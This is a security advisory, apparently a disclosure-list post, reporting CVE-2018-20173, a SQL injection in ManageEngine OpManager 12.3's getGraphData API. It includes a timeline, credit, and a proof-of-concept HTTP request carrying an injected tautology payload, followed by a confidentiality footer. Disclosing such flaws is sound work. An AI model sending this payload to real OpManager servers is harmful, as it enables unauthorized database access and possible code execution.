I. VULNERABILITY ------------------------- Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection via the getGraphData API. II. CVE REFERENCE ------------------------- CVE-2018-20173 III. VENDOR ------------------------- https://www.manageengine.com IV. TIMELINE ------------------------- 20/11/18 Vulnerability discovered 20/11/18 Vendor contacted 17/12/2018 OPManager replay that they fixed V. CREDIT ------------------------- Murat Aydemir from Biznet Bilisim A.S. VI. DESCRIPTION ------------------------- ManageEngine OPManager product(version 12.3) was vulnerable to SQL Injection attacks. A successfully exploit of this attack could allow arbitrary code execution or unauthenticated access in databases information. References: https://www.manageengine.com/network-monitoring/help/read-me.html https://bugbounty.zoho.com/bb/info#hof VII. PoC ------------------------- GET /api/json/v2/device/getGraphData?name=192.168.252.150&policyName=WMI-MemoryUtilization&index=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11&period=Today&withMMA=true&apiKey=XXXXXXXXXX&_=1539935355622 HTTP/1.1 Host: vulnerablehost.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://vulnerablehost.com/apiclient/ember/index.jsp OPMCurrentRoute: http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization X-Requested-With: XMLHttpRequest Cookie: JSESSIONID=XXXXXXXXXXX; encryptPassForAutomaticSignin=XXXXXXX; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; NFA__SSO=XXXXXXXXX; opmcsrfcookie=XXXXXXXXX DNT: 1 Connection: close -- Bu mesaj ve ekleri, mesajda gAPnderildiAi belirtilen kiAi/kiAilere APzeldir ve gizlidir. Bu mesaj herhangi bir amaASS iASSin ASSoAaltA+-lamaz, daAA+-tA+-lamaz ve yayA+-nlanamaz. MesajA+-n gAPnderildiAi kiAi deAilseniz, mesaj iASSeriAini ya da eklerini kopyalamayA+-nA+-z, yayA+-nlamayA+-nA+-z ya da baAka kiAilere yAPnlendirmeyiniz ve mesajA+- gAPnderen kiAiyi derhal uyararak bu mesajA+- siliniz. Airketimiz, mesajA+-n iASSeriAinin ve eklerinin size deAiAikliAe uArayarak veya geASS ulaAmasA+-ndan; gizliliAinin korunmamasA+-ndan; virA1/4s iASSermesinden ve bilgisayar sisteminize verebileceAi herhangi bir zarardan sorumlu deAildir This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.